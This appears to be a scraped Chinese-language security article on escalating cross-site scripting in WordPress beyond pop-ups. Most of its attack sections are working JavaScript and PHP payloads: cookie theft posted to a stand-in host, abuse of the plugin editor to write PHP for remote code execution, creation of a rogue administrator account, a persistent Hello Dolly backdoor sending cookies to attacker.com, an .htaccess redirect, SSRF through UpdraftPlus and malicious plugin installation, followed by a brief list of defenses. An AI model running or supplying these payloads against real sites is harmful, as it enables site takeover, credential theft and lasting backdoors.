XSS攻击面拓展：从瑞士军刀到变形金刚<\/h1>

1. XSS基础概念<\/h2>
Cross-site scripting(XSS)是一种Web端漏洞，允许攻击者通过注入HTML标签及JavaScript代码进入页面，当用户访问时浏览器会解析并执行恶意代码。<\/p>
典型XSS漏洞示例：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$username =<\/span> $_GET['user'<\/span>];
<\/span><\/span>echo<\/span> "Hello, <\/span>$username<\/span>"<\/span>;
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>当传入<script>alert(1)<\/script><\/code>时，代码会被执行。<\/p>
2. XSS攻击面拓展<\/h2>
2.1 盗取Cookie<\/h3>
基本方法：<\/p>
var<\/span> xml<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>xml<\/span>.open<\/span>('POST'<\/span>, 'http:\/\/xxxx'<\/span>, true<\/span>);
<\/span><\/span>xml<\/span>.setRequestHeader<\/span>("Content-type"<\/span>,"application\/x-www-form-urlencoded"<\/span>);
<\/span><\/span>xml<\/span>.send<\/span>('cookie='<\/span>+<\/span>document.cookie<\/span>);
<\/span><\/span><\/code><\/pre>局限性<\/strong>：无法获取HttpOnly标记的Cookie。<\/p>
2.2 XSS to RCE (远程代码执行)<\/h3>
通过WordPress插件编辑功能实现：<\/p>

利用Hello Dolly默认插件<\/li>
绕过CSRF防护机制（_wpnonce验证）<\/li>
修改插件文件内容<\/li>
<\/ol>
攻击流程：<\/p>
\/\/ 获取nonce
<\/span><\/span><\/span><\/span>url<\/span> =<\/span> window.location<\/span>.href<\/span>.split<\/span>('wp-admin'<\/span>)[0<\/span>];
<\/span><\/span>a<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>a<\/span>.open<\/span>('GET'<\/span>, url<\/span>+<\/span>'wp-admin\/plugin-editor.php?file=hello.php'<\/span>, 0<\/span>);
<\/span><\/span>a<\/span>.send<\/span>();
<\/span><\/span>
<\/span><\/span>\/\/ 写入恶意代码
<\/span><\/span><\/span><\/span>ss<\/span> =<\/span> '_wpnonce='<\/span>+<\/span>\/nonce" value=\/<\/span>.exec<\/span>(a<\/span>.responseText<\/span>)[1<\/span>]+<\/span>'&newcontent=<?php phpinfo();?>&action=update&file=hello.php'<\/span>;
<\/span><\/span>b<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>b<\/span>.open<\/span>('POST'<\/span>, url<\/span>+<\/span>'wp-admin\/plugin-editor.php?file=hello.php'<\/span>, 1<\/span>);
<\/span><\/span>b<\/span>.setRequestHeader<\/span>('Content-Type'<\/span>,'application\/x-www-form-urlencoded'<\/span>);
<\/span><\/span>b<\/span>.send<\/span>(ss<\/span>);
<\/span><\/span><\/code><\/pre>2.3 添加管理员账户<\/h3>
url<\/span> =<\/span> window.location<\/span>.href<\/span>.split<\/span>('wp-admin'<\/span>)[0<\/span>];
<\/span><\/span>a<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>a<\/span>.open<\/span>('GET'<\/span>, url<\/span>+<\/span>'wp-admin\/user-new.php'<\/span>, 0<\/span>);
<\/span><\/span>a<\/span>.send<\/span>();
<\/span><\/span>
<\/span><\/span>ss<\/span> =<\/span> '_wpnonce_create-user='<\/span>+<\/span>\/nonce_create-user" value=\/<\/span>.exec<\/span>(a<\/span>.responseText<\/span>)[1<\/span>]+<\/span>
<\/span><\/span>     '&action=createuser&email=attacker@example.com&pass1=password&pass1-text=password'<\/span>+<\/span>
<\/span><\/span>     '&pass2=password&pw_weak=on&role=administrator&user_login=attacker'<\/span>;
<\/span><\/span>
<\/span><\/span>b<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>b<\/span>.open<\/span>('POST'<\/span>, url<\/span>+<\/span>'wp-admin\/user-new.php'<\/span>, 1<\/span>);
<\/span><\/span>b<\/span>.setRequestHeader<\/span>('Content-Type'<\/span>,'application\/x-www-form-urlencoded'<\/span>);
<\/span><\/span>b<\/span>.send<\/span>(ss<\/span>);
<\/span><\/span><\/code><\/pre>2.4 持久化后门<\/h3>
修改Hello Dolly插件为持久化后门：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>\/*
<\/span><\/span><\/span>Plugin Name: Hello Dolly
<\/span><\/span><\/span>Version: 1.6
<\/span><\/span><\/span>*\/<\/span>
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><script>
<\/span><\/span><\/span>var d = new XMLHttpRequest(); 
<\/span><\/span><\/span>d.open('POST', 'http:\/\/attacker.com', true); 
<\/span><\/span><\/span>d.setRequestHeader("Content-type","application\/x-www-form-urlencoded");
<\/span><\/span><\/span>d.send('cookie=<?php echo urlencode(implode('#', $_COOKIE));?>');
<\/span><\/span><\/span><\/script>
<\/span><\/span><\/span><\/code><\/pre>2.5 破坏性利用<\/h3>

页面篡改<\/strong>：<\/li>
<\/ol>

<\/span><\/span><\/code><\/pre>
点击劫持<\/strong>：<\/li>
<\/ol>
<iframe<\/span> src<\/span>=<\/span>"xxxxx"<\/span> style<\/span>=<\/span>"border:0;position: absolute;top: 0;right: 0;width: 100%;height: 100%"<\/span> onload<\/span>=<\/span>"{dom xss}"<\/span>>
<\/span><\/span><\/code><\/pre>
修改.htaccess<\/strong>：<\/li>
<\/ol>
\/\/ 通过Yoast SEO工具修改.htaccess
<\/span><\/span><\/span><\/span>s<\/span> =<\/span> "%23%20BEGIN%20WordPress%0A%3CIfModule%20mod_rewrite.c%3E%0ARedirect%20%2fwordpress4.8%20https%3A%2f%2fattacker.com%0A%3C%2fIfModule%3E%0A%23%20END%20WordPress"<\/span>;
<\/span><\/span><\/code><\/pre>
DDoS攻击<\/strong>：注入恶意脚本使大量用户访问目标网站<\/li>
<\/ol>
2.6 后端利用（通过UpdraftPlus插件）<\/h3>

获取PHP信息：<\/li>
<\/ol>
wp-admin\/admin-ajax.php?page=updraftplus&action=updraft_ajax&subaction=phpinfo&nonce=cbe6c0b062
<\/code><\/pre>

内网扫描\/SSRF：<\/li>
<\/ol>
\/\/ 使用内置curl工具
<\/span><\/span><\/span><\/span>q2<\/span> =<\/span> 'nonce='<\/span>+<\/span>\/credentialtest_nonce=\/<\/span>.exec<\/span>(a<\/span>.responseText<\/span>)[1<\/span>]+<\/span>
<\/span><\/span>     '&uri=http:\/\/internal-server&action=updraft_ajax&subaction=httpget&curl=1'<\/span>;
<\/span><\/span><\/code><\/pre>3. 攻击优化与防御绕过<\/h2>

条件执行<\/strong>：与C2服务器交互，根据时间戳等条件控制执行<\/li>
代码混淆<\/strong>：将恶意代码混淆到正常代码中<\/li>
自动安装插件<\/strong>：<\/li>
<\/ol>
http:\/\/wordpress.site\/wp-admin\/update.php?action=install-plugin&updraftplus_noautobackup=1&plugin=malicious-plugin&_wpnonce=391ece6c0f
<\/code><\/pre>
4. 防御建议<\/h2>

对所有用户输入进行严格过滤和转义<\/li>
实施内容安全策略(CSP)<\/li>
使用HttpOnly标记Cookie<\/li>
限制插件编辑权限<\/li>
定期更新WordPress核心和插件<\/li>
监控异常文件修改<\/li>
<\/ol>
5. 总结<\/h2>
XSS漏洞的危害远不止简单的弹窗或Cookie窃取，在复杂环境下可以：<\/p>

实现远程代码执行<\/li>
添加管理员账户<\/li>
持久化控制网站<\/li>
进行内网渗透<\/li>
发动DDoS攻击<\/li>
完全控制网站内容<\/li>
<\/ul>
安全开发人员应充分认识XSS的潜在危害，采取多层次防御措施。<\/p>